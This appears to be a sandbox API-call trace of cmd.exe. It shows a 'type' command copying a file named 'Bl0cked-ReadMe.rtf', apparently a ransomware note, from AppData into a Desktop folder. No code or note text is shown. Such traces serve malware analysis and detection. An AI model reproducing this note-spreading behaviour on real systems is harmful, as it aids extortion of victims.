[0224.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fb40, lpFilePart=0x18fb3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fb3c*="Desktop") returned 0x18 [0224.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.686] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f8bc | out: lpFindFileData=0x18f8bc) 
returned 0x240028 [0224.686] FindClose (in: hFindFile=0x240028 | out: hFindFile=0x240028) returned 1 [0224.686] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f8bc | out: lpFindFileData=0x18f8bc) returned 0x240028 [0224.686] FindClose (in: hFindFile=0x240028 | out: hFindFile=0x240028) returned 1 [0224.686] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f8bc | out: lpFindFileData=0x18f8bc) returned 0x240028 [0224.686] FindClose (in: hFindFile=0x240028 | out: hFindFile=0x240028) returned 1 [0224.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.686] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0224.686] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0224.687] GetEnvironmentStringsW () returned 0x242b08* [0224.687] FreeEnvironmentStringsW (penv=0x242b08) returned 1 [0224.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.687] GetConsoleOutputCP () returned 0x1b5 [0224.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.689] GetUserDefaultLCID () returned 0x409 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fc80, cchData=128 | out: lpLCData="0") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fc80, cchData=128 | out: lpLCData="0") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fc80, cchData=128 | out: lpLCData="1") returned 2 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0224.689] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0224.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0224.690] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0224.690] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0224.691] GetConsoleTitleW (in: lpConsoleTitle=0x2308f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.691] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0224.691] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0224.691] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0224.692] _wcsicmp (_String1="type", _String2=")") returned 75 [0224.692] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0224.692] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0224.692] _wcsicmp (_String1="IF", _String2="type") returned -11 [0224.692] _wcsicmp (_String1="IF/?", 
_String2="type") returned -11 [0224.692] _wcsicmp (_String1="REM", _String2="type") returned -2 [0224.692] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0224.695] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.695] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.695] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.695] GetFileType (hFile=0x7) returned 0x2 [0224.696] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fb78 | out: lpMode=0x18fb78) returned 1 [0224.696] _dup (_FileHandle=1) returned 3 [0224.696] _close (_FileHandle=1) returned 0 [0224.696] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0224.696] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18fb48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0224.696] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0224.696] GetConsoleTitleW (in: lpConsoleTitle=0x18f978, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.697] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0224.697] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0224.697] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0224.697] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0224.697] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.698] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f4dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f4dc) returned 0x230e88 [0224.698] _wcsicmp 
(_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0224.698] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0224.698] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0224.698] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e3e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0224.698] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] GetFileType (hFile=0x54) returned 0x1 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e440 | out: lpFileSizeHigh=0x18e440*=0x0) returned 0x1632 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.700] GetFileType (hFile=0x4c) returned 0x1 [0224.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.700] GetFileType (hFile=0x4c) returned 0x1 [0224.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.700] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.701] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0224.701] GetFileType (hFile=0x4c) returned 0x1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] GetFileType (hFile=0x4c) returned 0x1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.702] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.702] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, 
lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.703] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 
0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.704] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.704] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) 
returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.706] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.706] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.707] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.707] ReadFile 
